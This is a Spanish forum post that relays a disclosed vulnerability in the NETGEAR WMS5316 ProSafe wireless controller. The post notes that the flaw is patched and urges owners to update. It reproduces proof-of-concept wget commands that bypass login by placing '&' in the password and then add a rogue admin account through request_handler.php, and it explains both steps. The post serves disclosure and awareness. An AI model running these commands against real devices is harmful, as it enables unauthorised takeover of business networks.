El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 08-09-2015 17:07:58

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,420

Los NETGEAR WMS5316 ProSafe 16AP no parecen muy "safe"

El switch NETGEAR WMS5316 ProSafe (16AP) comprometido por entrada sin credenciales y escala de privilegios

prosafe1.jpg

El "pro safe" es un switch de Netgear para redes profesionales.
Con este dispositivo se puede crear una red de hasta 16 puntos de accesos que controlamos gracias a la interfaz en java proporcionada por Netgear
Elliot LEWIS explica hoy como saltarse los credenciales para entrar en la interfaz de gestión de la red.
Y luego nos explica como obtener los privilegios de administrador para hacer modificaciones en la configuración.
Elliot ha descubierto la brecha en mayo y ha trabajado conjuntamente con Netgear.
Así que la vulnerabilidad esta corregida a partir del firmware que ha sacado en junio el fabricante.
Para los numerosos empresarios miembros de wifi-libre - y dios sabe que son muchos big_smile - es muy importante hacer un update de su "ProSafe"

Para los demás interesemos-nos a los mecanismos descritos en el full disclosure :

¿Como entrar en la GUI de gestión de la red sin conocer los credenciales? : ¡Con &!
[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt

En el ejemplo usamos wget para  forzar la entrada y crear una sesión gracias a un coockie.
Para lograr que no seamos rechazados debemos incluir el símbolo & en  la contraseña que mandamos en nuestros datas POST para autenticarse.
Podéis ver en el ejemplo que nos da el POC que se pone un simple & aqui

password%22%3A%20%22&%22%7D

Pasado un momento la GUI va a aceptarnos  y podremos visitar la GUI con ellos. big_smile

¿Como obtener los privilñegios de administrador para hacer lo que queremos?
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php

La idea aquí es simplemente de añadir con datas POST otra cuenta root. 
Una vez hecho la usaremos para tomar el control de la red.
No será necesario esta vez usar el símbolo &

¡Hasta la próxima!

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Pegado:
504 270173 15-07-2021 07:36:16 por Patcher
2 124 13-07-2021 18:09:01 por n0nick
Presentacion por zenner2021
2 127 10-07-2021 10:44:46 por kcdtv
9 1715 26-06-2021 17:34:16 por HROG67
2 390 21-06-2021 05:43:07 por javierferwolf

Pie de página

Información del usuario

Ultimo usuario registrado: t2chm1n
Usuarios registrados conectados: 0
Invitados conectados: 4

Estadisticas de los foros

Número total de usuarios registrados: 2,194
Número total de temas: 1,542
Número total de mensajes: 14,814

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36